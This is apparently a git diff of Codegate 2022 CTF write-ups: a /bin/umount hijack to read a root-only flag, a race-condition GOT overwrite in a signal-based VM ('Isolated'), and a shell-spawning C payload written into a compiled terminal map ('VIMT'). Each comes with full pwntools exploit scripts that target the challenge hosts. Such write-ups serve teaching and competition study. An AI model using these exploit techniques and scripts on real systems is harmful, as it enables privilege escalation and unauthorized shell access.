+The challenge files contain a Linux VM (kernel image + initramfs) and a customized Qemu. The Qemu patch is included and adds a custom PCI device. The challenge also includes a driver (1153 lines of C) for the custom device, which is built into the kernel. The flag is in the initramfs, and can only be read by root.
+
+We have access to an unprivileged shell, and the intended solution is to become root by exploiting memory corruption in the custom driver.
+
+Fortunately for us there is also a much easier way to solve this challenge:
+
+```
+Initialization is done. Enjoy :)
+/ $ ls -la
+...
+drwxrwxr-x 2 user user 0 Nov 22 07:37 bin
+...
+```
+
+The `/bin` directory is owned by our user 👀. It appears that the author has... _forgotten_... to change the owner of some directories to root. That means that we can delete and create files there. At boot the VM executes the following init script as root:
+
+```sh
+#!/bin/sh
+
+mknod -m 0666 /dev/null c 1 3
+mknod -m 0660 /dev/ttyS0 c 4 64
+
+mount -t proc proc /proc
+mount -t sysfs sysfs /sys
+mount -t tmpfs tmpfs /tmp
+
+cat < /proc/sys/kernel/kptr_restrict
+
+mknod /dev/cgs-3d0 c 246 0
+setsid cttyhack setuidgid 1000 /bin/sh
+
+umount /proc
+umount /sys
+
+poweroff -f
+```
+
+The script invokes `umount` (`/bin/umount`) and `poweroff` (`/bin/poweroff`) as root after our unprivileged shell exits. Since we own `/bin`, we can simply delete `/bin/umount` and replace it with a script that prints the flag.
+
+```
+/ $ rm /bin/umount
+/ $ echo '#!/bin/sh' > /bin/umount
+/ $ echo 'cat /flag > /dev/ttyS0' >> /bin/umount
+/ $ chmod +x /bin/umount
+/ $ exit
+codegate2022{86776b92d17cd0dbceaf835d981a31f940c7f9e24613d4a261a2d38545218fc35b116036ea2989821248908e9984e0ee8272b3e85db10377f22e91adf990f73ff3c9c1a4e4c62784}
+codegate2022{86776b92d17cd0dbceaf835d981a31f940c7f9e24613d4a261a2d38545218fc35b116036ea2989821248908e9984e0ee8272b3e85db10377f22e91adf990f73ff3c9c1a4e4c62784}
+```
\ No newline at end of file
diff --git a/Codegate-2022-quals/pwn/isolated.html b/Codegate-2022-quals/pwn/isolated.html
new file mode 100755
index 0000000..6d0590c
--- /dev/null
+++ b/Codegate-2022-quals/pwn/isolated.html
@@ -0,0 +1,397 @@
+
+
+
+
+
+Isolated | Organisers
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
We’re provided a small executable that fork()s and sets up a server-client relation, where the parent process acts as server that receives instructions from the client. We can provided 0x300 bytes of custom instructions that will be ran on the simple stack architecture VM that the server and client define together. The client and server share a memory mapping (with MAP_SHARED) that they will use for communication of routine arguments and results.
+
+
The architecture
+
+
The server defines a few signal handlers that respectively push, pop and clean the stack, and one that enables “logging mode”. The logging mode makes all other signal handlers print some debug information before executing. The stack has defined bounds at stack_ptr = 0 and stack_ptr = 768, after which pop and push respectively will fail.
+
+
The client is tasked with decoding the provided instructions, and then sends a signal to the parent process to execute a signal handler. The signal handler then executes, and a variable in the shared memory is set to indicate the result. It should be noted that the following seccomp policy is applied to the child:
+
+
line CODE JT JF K
+=================================
+ 0000: 0x20 0x00 0x00 0x00000004 A = arch
+ 0001: 0x15 0x00 0x03 0xc000003e if (A != ARCH_X86_64) goto 0005
+ 0002: 0x20 0x00 0x00 0x00000000 A = sys_number
+ 0003: 0x15 0x00 0x01 0x0000003e if (A != kill) goto 0005
+ 0004: 0x06 0x00 0x00 0x7fff0000 return ALLOW
+ 0005: 0x06 0x00 0x00 0x00000001 return KILL
+
+
+
This hints us towards that fact that we should be exploiting the parent process.
+
+
There’s a few defined instructions:
+
+
<0> <xx xx xx xx> pushes xx xx xx xx
+<1> pops (into the void)
+
+The next instructions can take either a 4-byte immediate or a value popped from the stack.
+A pop is denoted by <0x55> and an immediate is denoted by <0x66> <xx xx xx xx>. We'll call this a <imm/pop>
+
+<2> <imm/pop> <imm/pop> adds two operands and pushes the result
+<3> <imm/pop> <imm/pop> subtracts two operands and pushes the result
+<4> <imm/pop> <imm/pop> multiplies two operands and pushes the result
+<5> <imm/pop> <imm/pop> divides two operands and pushes the result
+<6> <imm/pop> <imm/pop> compares if the two operands are equal and sets a flag if this is the case.
+
+<7> <imm/pop> jumps to the operand
+<8> <imm/pop> jumps to the operand IF the flag is set (see 6)
+<9> cleans the stack
+<10> <imm/pop> sets log mode to the operand (any non-zero value is on)
+
+Anything else will kill parent and child immediately.
+
+
+
The bug
+
+
All pops and pushes are blocking (they wait for the result), except the normal push and pop instructions <0> and <1>. Since these instructions don’t wait for the result, they can cause a desynchronization of state. We can trigger a signal handler in the parent whilst another signal handler is already running, which is effectively a kind of concurrence on a single execution core. We can use the resulting race condition to circumvent the bound check for pop and push in the parent process.
+
+
The resulting exploit underflows the stack pointer to -1, at which point we can navigate the stack pointer to a GOT entry (I picked puts) and use the add instruction (<2>) to add a constant offset to a one shot gadget to its lower four bytes.
+
+
Winning the race was mostly a bunch of trial and error, I combined pop with clean_stack, so the stack pointer will be zeroed but the pop routine will still decrement it. On local docker, i was able to win the race about 25% of the time, but on remote it is less than 1%.
+
+
The exploit
+
+
frompwnimport*
+frompwnlib.util.procimportdescendants
+context.terminal=["terminator","-e"]
+
+BINARY_NAME="./isolated"
+LIBC_NAME="./libc.so"
+REMOTE=("3.38.234.54",7777)
+DOCKER_REMOTE=("127.0.0.1",7777)
+
+context.binary=BINARY_NAME
+binary=context.binary
+libc=ELF(LIBC_NAME)
+
+EXEC_STR=[binary.path]
+
+PIE_ENABLED=binary.pie
+
+BREAKPOINTS=[int(x,16)forxinargs.BREAK.split(',')]ifargs.BREAKelse[]
+
+gdbscript_break='\n'.join([f"{'pie 'ifPIE_ENABLEDelse''}break *{hex(x)}"forxinBREAKPOINTS])
+
+gdbscript= \
+ """
+ set follow-fork-mode child
+ """
+
+
+defhandle():
+
+ env={"LD_PRELOAD":libc.path}
+
+ ifargs.REMOTE:
+ returnremote(*REMOTE)
+
+ elifargs.LOCAL:
+ p=process(EXEC_STR,env=env)
+ elifargs.GDB:
+ p=gdb.debug(EXEC_STR,env=env,gdbscript=gdbscript_break+gdbscript)
+
+ elifargs.DOCKER:
+ p=remote(*DOCKER_REMOTE)
+ else:
+ error("No argument supplied.\nUsage: python exploit.py (REMOTE|LOCAL) [GDB] [STRACE]")
+
+ ifargs.STRACE:
+ subprocess.Popen([*context.terminal,f"strace -p {p.pid}; cat"])
+ input("Waiting for enter...")
+
+ returnp
+
+defmain():
+ l=handle()
+ #print(l.pid)
+"""
+ <0> <xx xx xx xx> pushes xx xx xx xx
+ <1> pops (into the void)
+
+ The next instructions can take either a 4-byte immediate or a value popped from the stack.
+ A pop is denoted by <0x55> and an immediate is denoted by <0x66> <xx xx xx xx>. We'll call this a <imm/pop>
+
+ <2> <imm/pop> <imm/pop> adds two operands and pushes the result
+ <3> <imm/pop> <imm/pop> subtracts two operands and pushes the result
+ <4> <imm/pop> <imm/pop> multiplies two operands and pushes the result
+ <5> <imm/pop> <imm/pop> divides two operands and pushes the result
+ <6> <imm/pop> <imm/pop> compares if the two operands are equal and sets a flag if this is the case.
+
+ <7> <imm/pop> jumps to the operand
+ <8> <imm/pop> jumps to the operand IF the flag is set (see 6)
+ <9> cleans the stack
+ <10> <imm/pop> sets log mode to the operand (any non-zero value is on)
+
+ anything else kills the parent immediately
+ """
+
+ ONE_GADGETS=[
+ 0x4f432,
+ 0x10a41c
+ ]
+
+ rel_og_offsets=[og-libc.symbols['puts']foroginONE_GADGETS];
+ print(rel_og_offsets)
+
+ dbg=lambdax:[10,0x66,*p32(x)]
+ pop=lambda:[1]
+ cmp_pop_blocking=lambday:[6,0x55,0x66,*p32(y)]# compares if popped value equal to 0 and sets flag
+push_blocking=lambdax:[2,0x66,*p32(x),0x66,*p32(0)]# adds
+jmp=lambdax:[7,0x66,*p32(x)]
+ clean_stack=lambda:[9]
+ cmp_imm_imm=lambda:[6,0x66,*p32(0x41414141),0x66,*p32(0x41414142)]
+ add_constant=lambdax:[2,0x66,*p32(x&0xffffffff),0x55]
+
+ payload=[*dbg(0x01)]# 6
+
+ start=len(payload)
+
+ offset=(0x203100-binary.got['puts'])//4
+ print(offset)
+
+ payload.extend([
+ *push_blocking(1),
+ *[*cmp_imm_imm()*10],
+ *pop(),*pop(),
+ *clean_stack(),
+ *[*cmp_imm_imm()*10],
+ *cmp_pop_blocking(0xffffffff),
+ *dbg(1),
+ *[*cmp_imm_imm()*5],
+ *[*push_blocking(-offset&0xffffffff)*2],
+ *add_constant(rel_og_offsets[0]),
+ *dbg(1),# get shell!
+])
+
+
+ payload.extend(jmp(len(payload)))
+
+ print(len(payload))
+ payload=bytes(payload)
+ #print(hexdump(payload))
+l.recvuntil(b"opcodes >")
+
+ l.send(payload)
+
+ print(f"puts @ {hex(libc.symbols['puts'])}")
+
+ time.sleep(3)
+ l.sendline("cat flag")
+
+ assertb"timeout"notinl.stream()
+
+if__name__=="__main__":
+ main()
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/Codegate-2022-quals/pwn/isolated.md b/Codegate-2022-quals/pwn/isolated.md
new file mode 100755
index 0000000..1b9c369
--- /dev/null
+++ b/Codegate-2022-quals/pwn/isolated.md
@@ -0,0 +1,201 @@
+# Isolated
+
+**Author**: pql
+
+**Tags:** pwn
+
+**Points:** 884 (19 solves)
+
+**Description:**
+
+> Simple VM, But isloated.
+
+We're provided a small executable that `fork()`s and sets up a server-client relation, where the parent process acts as server that receives instructions from the client. We can provided `0x300` bytes of custom instructions that will be ran on the simple stack architecture VM that the server and client define together. The client and server share a memory mapping (with `MAP_SHARED`) that they will use for communication of routine arguments and results.
+
+#### The architecture
+
+
+
+The server defines a few signal handlers that respectively push, pop and clean the stack, and one that enables "logging mode". The logging mode makes all other signal handlers print some debug information before executing. The stack has defined bounds at `stack_ptr = 0` and `stack_ptr = 768`, after which `pop` and `push` respectively will fail.
+
+The client is tasked with decoding the provided instructions, and then sends a signal to the parent process to execute a signal handler. The signal handler then executes, and a variable in the shared memory is set to indicate the result. It should be noted that the following seccomp policy is applied to the child:
+
+```
+ line CODE JT JF K
+=================================
+ 0000: 0x20 0x00 0x00 0x00000004 A = arch
+ 0001: 0x15 0x00 0x03 0xc000003e if (A != ARCH_X86_64) goto 0005
+ 0002: 0x20 0x00 0x00 0x00000000 A = sys_number
+ 0003: 0x15 0x00 0x01 0x0000003e if (A != kill) goto 0005
+ 0004: 0x06 0x00 0x00 0x7fff0000 return ALLOW
+ 0005: 0x06 0x00 0x00 0x00000001 return KILL
+```
+
+This hints us towards that fact that we should be exploiting the parent process.
+
+There's a few defined instructions:
+
+```
+<0> pushes xx xx xx xx
+<1> pops (into the void)
+
+The next instructions can take either a 4-byte immediate or a value popped from the stack.
+A pop is denoted by <0x55> and an immediate is denoted by <0x66> . We'll call this a
+
+<2> adds two operands and pushes the result
+<3> subtracts two operands and pushes the result
+<4> multiplies two operands and pushes the result
+<5> divides two operands and pushes the result
+<6> compares if the two operands are equal and sets a flag if this is the case.
+
+<7> jumps to the operand
+<8> jumps to the operand IF the flag is set (see 6)
+<9> cleans the stack
+<10> sets log mode to the operand (any non-zero value is on)
+
+Anything else will kill parent and child immediately.
+```
+
+#### The bug
+
+All pops and pushes are *blocking* (they wait for the result), except the normal push and pop instructions <0> and <1>. Since these instructions don't wait for the result, they can cause a desynchronization of state. We can trigger a signal handler in the parent whilst another signal handler is already running, which is effectively a kind of concurrence on a single execution core. We can use the resulting race condition to circumvent the bound check for `pop` and `push` in the parent process.
+
+The resulting exploit underflows the stack pointer to -1, at which point we can navigate the stack pointer to a GOT entry (I picked `puts`) and use the add instruction (`<2>`) to add a constant offset to a one shot gadget to its lower four bytes.
+
+Winning the race was mostly a bunch of trial and error, I combined `pop` with `clean_stack`, so the stack pointer will be zeroed but the `pop` routine will still decrement it. On local docker, i was able to win the race about 25% of the time, but on remote it is less than 1%.
+
+#### The exploit
+
+```python
+from pwn import *
+from pwnlib.util.proc import descendants
+context.terminal = ["terminator", "-e"]
+
+BINARY_NAME = "./isolated"
+LIBC_NAME = "./libc.so"
+REMOTE = ("3.38.234.54", 7777)
+DOCKER_REMOTE = ("127.0.0.1", 7777)
+
+context.binary = BINARY_NAME
+binary = context.binary
+libc = ELF(LIBC_NAME)
+
+EXEC_STR = [binary.path]
+
+PIE_ENABLED = binary.pie
+
+BREAKPOINTS = [int(x, 16) for x in args.BREAK.split(',')] if args.BREAK else []
+
+gdbscript_break = '\n'.join([f"{'pie ' if PIE_ENABLED else ''}break *{hex(x)}" for x in BREAKPOINTS])
+
+gdbscript = \
+ """
+ set follow-fork-mode child
+ """
+
+
+def handle():
+
+ env = {"LD_PRELOAD": libc.path}
+
+ if args.REMOTE:
+ return remote(*REMOTE)
+
+ elif args.LOCAL:
+ p = process(EXEC_STR, env=env)
+ elif args.GDB:
+ p = gdb.debug(EXEC_STR, env=env, gdbscript=gdbscript_break + gdbscript)
+
+ elif args.DOCKER:
+ p = remote(*DOCKER_REMOTE)
+ else:
+ error("No argument supplied.\nUsage: python exploit.py (REMOTE|LOCAL) [GDB] [STRACE]")
+
+ if args.STRACE:
+ subprocess.Popen([*context.terminal, f"strace -p {p.pid}; cat"])
+ input("Waiting for enter...")
+
+ return p
+
+def main():
+ l = handle()
+ #print(l.pid)
+ """
+ <0> pushes xx xx xx xx
+ <1> pops (into the void)
+
+ The next instructions can take either a 4-byte immediate or a value popped from the stack.
+ A pop is denoted by <0x55> and an immediate is denoted by <0x66> . We'll call this a
+
+ <2> adds two operands and pushes the result
+ <3> subtracts two operands and pushes the result
+ <4> multiplies two operands and pushes the result
+ <5> divides two operands and pushes the result
+ <6> compares if the two operands are equal and sets a flag if this is the case.
+
+ <7> jumps to the operand
+ <8> jumps to the operand IF the flag is set (see 6)
+ <9> cleans the stack
+ <10> sets log mode to the operand (any non-zero value is on)
+
+ anything else kills the parent immediately
+ """
+
+ ONE_GADGETS = [
+ 0x4f432,
+ 0x10a41c
+ ]
+
+ rel_og_offsets = [og - libc.symbols['puts'] for og in ONE_GADGETS];
+ print(rel_og_offsets)
+
+ dbg = lambda x: [10, 0x66, *p32(x)]
+ pop = lambda: [1]
+ cmp_pop_blocking = lambda y: [6, 0x55, 0x66, *p32(y)] # compares if popped value equal to 0 and sets flag
+ push_blocking = lambda x: [2, 0x66, *p32(x), 0x66, *p32(0)] # adds
+ jmp = lambda x: [7, 0x66, *p32(x)]
+ clean_stack = lambda: [9]
+ cmp_imm_imm = lambda: [6, 0x66, *p32(0x41414141), 0x66, *p32(0x41414142)]
+ add_constant = lambda x: [2, 0x66, *p32(x & 0xffffffff), 0x55]
+
+ payload = [*dbg(0x01)] # 6
+
+ start = len(payload)
+
+ offset = (0x203100 - binary.got['puts']) // 4
+ print(offset)
+
+ payload.extend([
+ *push_blocking(1),
+ *[*cmp_imm_imm() * 10],
+ *pop(), *pop(),
+ *clean_stack(),
+ *[*cmp_imm_imm() * 10],
+ *cmp_pop_blocking(0xffffffff),
+ *dbg(1),
+ *[*cmp_imm_imm() * 5],
+ *[*push_blocking(-offset & 0xffffffff) * 2],
+ *add_constant(rel_og_offsets[0]),
+ *dbg(1), # get shell!
+ ])
+
+
+ payload.extend(jmp(len(payload)))
+
+ print(len(payload))
+ payload = bytes(payload)
+ #print(hexdump(payload))
+ l.recvuntil(b"opcodes >")
+
+ l.send(payload)
+
+ print(f"puts @ {hex(libc.symbols['puts'])}")
+
+ time.sleep(3)
+ l.sendline("cat flag")
+
+ assert b"timeout" not in l.stream()
+
+if __name__ == "__main__":
+ main()
+```
diff --git a/Codegate-2022-quals/pwn/vimt.html b/Codegate-2022-quals/pwn/vimt.html
new file mode 100755
index 0000000..eb72543
--- /dev/null
+++ b/Codegate-2022-quals/pwn/vimt.html
@@ -0,0 +1,462 @@
+
+
+
+
+
+VIMT | Organisers
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
Although a somewhat unconventional setup (ssh’ing into the binary1), the binary itself is fairly simple and even comes with symbols. The basic functionality is as follows:
+
+
The binary creates a 2D map the size of your terminal. In a loop, it waits for you to enter a character. The character gets placed at the current position in the map, followed by 5 random characters. In addition, by sending a \x1b character, a command could be executed. The interesting commands are:
+
+
+
compile: Compiles the current map as C code and executes the result.
+
set: Set the y coordinate of the current map position.
+
+
+
We also notice some interesting setup code in init:
+
+
v4=clock();
+v3=time(0LL);
+v0=getpid();
+v1=mix(v4,v3,v0);// some z3 looking combination of inputs.
+srand(v1);
+
+
+
To me it looked like the intentional solution might have been to reverse the mix function and figure out the random seed to predict which additional letters get added to the map. However, we can actually solve this without having to do that.
+I noticed, that by having a prime terminal width, we could actually also set the x coordinate. If we can set the x coordinate, we can of course create arbitrary map contents.
+
+
If our terminal has a width of 29 and every time we enter a character the x position moves by 6, we can do the following:
+
+
+
Enter 5 characters, now x position moves by 30 (with wrap around)
+
This means x position is now actually one after the original x position
+
+
+
Since we can reset the y position to the original value, we can hence control the x position and can write anything on the map. Since doing this on the server was very slow (for some reason) and I probably made a mistake with my python code (more than one line would break it), we wanted a payload that is shorter than 29 characters. Luckily the following worked main(){system("sh");}//.
+
+
Now the only thing left was fighting with pwntools, ssh and pseudoterminals (aka try random options until you get it to work) to actually have the correctly sized terminal on the remote. After that, it was just waiting around 20 minutes and then we got a shell. For some reason, I did not see any stdout of the remote terminal (except newlines maybe), so I had to exfil the flag with some bash magic.
+
+
The final exploit script:
+
+
#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+# This exploit template was generated via:
+# $ pwn template app
+frompwnimport*
+importrandom
+
+# Set up pwntools for the correct architecture
+exe=context.binary=ELF('app')
+
+
+deflocal(argv=[],*a,**kw):
+ '''Start the exploit against the target.'''
+ ifargs.GDB:
+ returngdb.debug([exe.path]+argv,gdbscript=gdbscript,*a,**kw)
+ else:
+ returnprocess([exe.path]+argv,stdin=PTY,raw=False,*a,**kw)
+
+defremote():
+ #return ssh("ctf", host="3.38.59.103", port=1234, password="ctf1234_smiley")
+# stty cols 29 rows 12
+p=process("sshpass -e ssh -tt ctf@3.38.59.103 -p 1234 'bash -i'",shell=True,env={"SSHPASS":"ctf1234_smiley"})
+ p.sendlineafter("~$ ","stty cols 29 rows 12")
+ p.sendlineafter("~$ ","./app")
+ returnp
+
+defstart(*a,**kw):
+ ifargs.LOCAL:
+ returnlocal(*a,**kw)
+ returnremote(*a,**kw)
+
+# Specify your GDB script here for debugging
+# GDB will be launched if the exploit is run via e.g.
+# ./exploit.py GDB
+gdbscript='''
+tbreak main
+continue
+'''.format(**locals())
+
+#===========================================================
+# EXPLOIT GOES HERE
+#===========================================================
+# Arch: amd64-64-little
+# RELRO: Partial RELRO
+# Stack: No canary found
+# NX: NX enabled
+# PIE: No PIE (0x400000)
+
+#### remote comms
+WIDTH=29
+HEIGHT=10
+
+defread_mappa():
+ begin=io.recvuntil(b"-"*WIDTH)
+ read_map=io.recvuntil(b"-"*WIDTH)
+ log.debug("REMOTE MAP:\n%s",read_map.decode("utf8",errors="ignore"))
+ returnbegin+read_map
+
+defsend_data(data):
+ ifisinstance(data,str):
+ data=data.encode("utf8")
+ io.send(data)
+ returnread_mappa()
+
+defsend_command(cmd,read=True):
+ io.send(b"\x1b")
+ ifisinstance(cmd,str):
+ cmd=cmd.encode("utf8")
+ io.sendline(cmd)
+ ifread:
+ returnread_mappa()
+ returnNone
+
+defdo_compile():
+ returnsend_command("compile",False)
+
+defdo_set_y(y_val):
+ returnsend_command(f"set y {y_val}")
+
+RAND_CHARS="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789{}!"
+
+log.info("Using terminal of size %d x %d",WIDTH,HEIGHT)
+
+mappa=[]
+foryinrange(HEIGHT):
+ row=""
+ forxinrange(WIDTH):
+ row+=" "
+ mappa.append(row)
+
+cur_x=0
+cur_y=0
+
+defcheck_coords_up():
+ globalcur_x,cur_y
+ ifcur_x>=WIDTH:
+ cur_x=0
+ cur_y+=1
+ ifcur_y>=HEIGHT:
+ cur_y=HEIGHT-1
+
+defset_car(car):
+ globalmappa,cur_y,cur_x
+ row=mappa[cur_y]
+ mappa[cur_y]=row[:cur_x]+car+row[cur_x+1:]
+
+definpKey(car):
+ globalcur_x
+ rem_map=send_data(car)
+ check_coords_up()
+ set_car(car)
+ cur_x+=1
+ foriinrange(5):
+ check_coords_up()
+ rand_car=random.choice(RAND_CHARS)
+ set_car(rand_car)
+ cur_x+=1
+ returnrem_map
+
+defset_y(y_val):
+ globalcur_y
+ do_set_y(y_val)
+ cur_y=y_val
+
+defset_x(x_val):
+ globalcur_y,cur_x
+ ifcur_x==x_val:
+ return
+ # this is more involved!
+
+ # number of times to enter a character for a row to be filled.
+# every time we enter a character, we write 6 to the map!
+min_to_fill=(WIDTH//6)+1
+ # number of characters the new x position on the next row will be offset
+offset=min_to_fill*6-WIDTH
+ # we could actually use any offset, would just mean more math lol
+assertoffset==1
+ # number of characters difference between desired and required x val
+diff=(x_val-cur_x)
+ ifdiff<0:
+ diff+=WIDTH
+ num_inputs=(diff//offset)*min_to_fill
+ log.debug("Additional inputs: %d",num_inputs)
+ forkinrange(num_inputs):
+ inpKey("G")
+ log.debug("cur_x %d vs x_val %d",cur_x,x_val)
+ assertcur_x==x_val
+
+
+defpmap():
+ log.info("MAP:\n%s","\n".join(mappa))
+
+defwrite_line(y,s:str):
+ log.debug("Writing line %s @ y = %d",s,y)
+ foridx,carinenumerate(s):
+ set_x(idx)
+ set_y(y)
+ inpKey(car)
+ set_x(len(s))
+ set_y(y)
+ inpKey("\n")
+
+defwrite_str(start_x,start_y,s:str):
+ x=start_x
+ y=start_y
+ foridx,carinenumerate(s):
+
+ ifx>=WIDTH:
+ x=0
+ y=+1
+ ify>=HEIGHT:
+ log.error("FAILED TO WRITE STRING!")
+ log.info("Writing %s at %d, %d",car,x,y)
+ set_x(x)
+ set_y(y)
+ rem_map=inpKey(car)
+ ifidx%10:
+ log.info("remote map:\n%s",rem_map.decode("utf8",errors="ignore"))
+ x+=1
+
+log.info("Initial map:")
+pmap()
+
+io=start()
+# io.interactive()
+init_map=read_mappa()
+log.info("init remote map:\n%s",init_map.decode("utf8",errors="ignore"))
+
+PAYLOAD="""main(){system("sh");}//"""
+log.info("PAYLOAD:\n%s",PAYLOAD)
+
+write_str(0,0,PAYLOAD)
+log.info("map with payload:")
+pmap()
+log.info("Writing map to file: test.c")
+withopen("test.c","w")asf:
+ f.write("".join(mappa))
+
+rem_map=send_data("$")
+log.info("Remote map:\n%s",rem_map.decode("utf8",errors="ignore"))
+pause()
+do_compile()
+io.interactive()
+
+
+
+
+
+
+
The setup actually allowed you to get a terminal on the server. However, since the flag is only readable by root and the challenge binary is setuid, we still need to pwn the binary. ↩
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/Codegate-2022-quals/pwn/vimt.md b/Codegate-2022-quals/pwn/vimt.md
new file mode 100755
index 0000000..d1a71da
--- /dev/null
+++ b/Codegate-2022-quals/pwn/vimt.md
@@ -0,0 +1,253 @@
+# VIMT
+
+**Author**: [gallileo](https://twitter.com/galli_leo_)
+
+**Tags:** pwn
+
+**Points:** 856 (21 solves)
+
+**Description:**
+
+> `ssh ctf@3.38.59.103 -p 1234 password: ctf1234_smiley`
+>
+> Monkeys help you
+
+Although a somewhat unconventional setup (ssh'ing into the binary[^1]), the binary itself is fairly simple and even comes with symbols. The basic functionality is as follows:
+
+The binary creates a 2D map the size of your terminal. In a loop, it waits for you to enter a character. The character gets placed at the current position in the map, followed by 5 random characters. In addition, by sending a `\x1b` character, a command could be executed. The interesting commands are:
+
+- `compile`: Compiles the current map as C code and executes the result.
+- `set`: Set the y coordinate of the current map position.
+
+We also notice some interesting setup code in `init`:
+
+```c
+v4 = clock();
+v3 = time(0LL);
+v0 = getpid();
+v1 = mix(v4, v3, v0); // some z3 looking combination of inputs.
+srand(v1);
+```
+
+To me it looked like the intentional solution might have been to reverse the mix function and figure out the random seed to predict which additional letters get added to the map. However, we can actually solve this without having to do that.
+I noticed, that by having a prime terminal width, we could actually also set the x coordinate. If we can set the x coordinate, we can of course create arbitrary map contents.
+
+If our terminal has a width of 29 and every time we enter a character the x position moves by 6, we can do the following:
+
+1. Enter 5 characters, now x position moves by 30 (with wrap around)
+2. This means x position is now actually one after the original x position
+
+Since we can reset the y position to the original value, we can hence control the x position and can write anything on the map. Since doing this on the server was very slow (for some reason) and I probably made a mistake with my python code (more than one line would break it), we wanted a payload that is shorter than 29 characters. Luckily the following worked `main(){system("sh");}//`.
+
+Now the only thing left was fighting with pwntools, ssh and pseudoterminals (aka try random options until you get it to work) to actually have the correctly sized terminal on the remote. After that, it was just waiting around 20 minutes and then we got a shell. For some reason, I did not see any stdout of the remote terminal (except newlines maybe), so I had to exfil the flag with some bash magic.
+
+The final exploit script:
+
+```python
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+# This exploit template was generated via:
+# $ pwn template app
+from pwn import *
+import random
+
+# Set up pwntools for the correct architecture
+exe = context.binary = ELF('app')
+
+
+def local(argv=[], *a, **kw):
+ '''Start the exploit against the target.'''
+ if args.GDB:
+ return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
+ else:
+ return process([exe.path] + argv, stdin=PTY, raw=False, *a, **kw)
+
+def remote():
+ #return ssh("ctf", host="3.38.59.103", port=1234, password="ctf1234_smiley")
+ # stty cols 29 rows 12
+ p = process("sshpass -e ssh -tt ctf@3.38.59.103 -p 1234 'bash -i'", shell=True, env={"SSHPASS": "ctf1234_smiley"})
+ p.sendlineafter("~$ ", "stty cols 29 rows 12")
+ p.sendlineafter("~$ ", "./app")
+ return p
+
+def start(*a, **kw):
+ if args.LOCAL:
+ return local(*a, **kw)
+ return remote(*a, **kw)
+
+# Specify your GDB script here for debugging
+# GDB will be launched if the exploit is run via e.g.
+# ./exploit.py GDB
+gdbscript = '''
+tbreak main
+continue
+'''.format(**locals())
+
+#===========================================================
+# EXPLOIT GOES HERE
+#===========================================================
+# Arch: amd64-64-little
+# RELRO: Partial RELRO
+# Stack: No canary found
+# NX: NX enabled
+# PIE: No PIE (0x400000)
+
+#### remote comms
+WIDTH = 29
+HEIGHT = 10
+
+def read_mappa():
+ begin = io.recvuntil(b"-"*WIDTH)
+ read_map = io.recvuntil(b"-"*WIDTH)
+ log.debug("REMOTE MAP:\n%s", read_map.decode("utf8", errors="ignore"))
+ return begin + read_map
+
+def send_data(data):
+ if isinstance(data, str):
+ data = data.encode("utf8")
+ io.send(data)
+ return read_mappa()
+
+def send_command(cmd, read = True):
+ io.send(b"\x1b")
+ if isinstance(cmd, str):
+ cmd = cmd.encode("utf8")
+ io.sendline(cmd)
+ if read:
+ return read_mappa()
+ return None
+
+def do_compile():
+ return send_command("compile", False)
+
+def do_set_y(y_val):
+ return send_command(f"set y {y_val}")
+
+RAND_CHARS = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789{}!"
+
+log.info("Using terminal of size %d x %d", WIDTH, HEIGHT)
+
+mappa = []
+for y in range(HEIGHT):
+ row = ""
+ for x in range(WIDTH):
+ row += " "
+ mappa.append(row)
+
+cur_x = 0
+cur_y = 0
+
+def check_coords_up():
+ global cur_x, cur_y
+ if cur_x >= WIDTH:
+ cur_x = 0
+ cur_y += 1
+ if cur_y >= HEIGHT:
+ cur_y = HEIGHT - 1
+
+def set_car(car):
+ global mappa, cur_y, cur_x
+ row = mappa[cur_y]
+ mappa[cur_y] = row[:cur_x] + car + row[cur_x+1:]
+
+def inpKey(car):
+ global cur_x
+ rem_map = send_data(car)
+ check_coords_up()
+ set_car(car)
+ cur_x += 1
+ for i in range(5):
+ check_coords_up()
+ rand_car = random.choice(RAND_CHARS)
+ set_car(rand_car)
+ cur_x += 1
+ return rem_map
+
+def set_y(y_val):
+ global cur_y
+ do_set_y(y_val)
+ cur_y = y_val
+
+def set_x(x_val):
+ global cur_y, cur_x
+ if cur_x == x_val:
+ return
+ # this is more involved!
+
+ # number of times to enter a character for a row to be filled.
+ # every time we enter a character, we write 6 to the map!
+ min_to_fill = (WIDTH // 6) + 1
+ # number of characters the new x position on the next row will be offset
+ offset = min_to_fill * 6 - WIDTH
+ # we could actually use any offset, would just mean more math lol
+ assert offset == 1
+ # number of characters difference between desired and required x val
+ diff = (x_val - cur_x)
+ if diff < 0:
+ diff += WIDTH
+ num_inputs = (diff // offset) * min_to_fill
+ log.debug("Additional inputs: %d", num_inputs)
+ for k in range(num_inputs):
+ inpKey("G")
+ log.debug("cur_x %d vs x_val %d", cur_x, x_val)
+ assert cur_x == x_val
+
+
+def pmap():
+ log.info("MAP:\n%s", "\n".join(mappa))
+
+def write_line(y, s: str):
+ log.debug("Writing line %s @ y = %d", s, y)
+ for idx, car in enumerate(s):
+ set_x(idx)
+ set_y(y)
+ inpKey(car)
+ set_x(len(s))
+ set_y(y)
+ inpKey("\n")
+
+def write_str(start_x, start_y, s: str):
+ x = start_x
+ y = start_y
+ for idx, car in enumerate(s):
+
+ if x >= WIDTH:
+ x = 0
+ y =+ 1
+ if y >= HEIGHT:
+ log.error("FAILED TO WRITE STRING!")
+ log.info("Writing %s at %d, %d", car, x, y)
+ set_x(x)
+ set_y(y)
+ rem_map = inpKey(car)
+ if idx % 10:
+ log.info("remote map:\n%s", rem_map.decode("utf8", errors="ignore"))
+ x += 1
+
+log.info("Initial map:")
+pmap()
+
+io = start()
+# io.interactive()
+init_map = read_mappa()
+log.info("init remote map:\n%s", init_map.decode("utf8", errors="ignore"))
+
+PAYLOAD = """main(){system("sh");}//"""
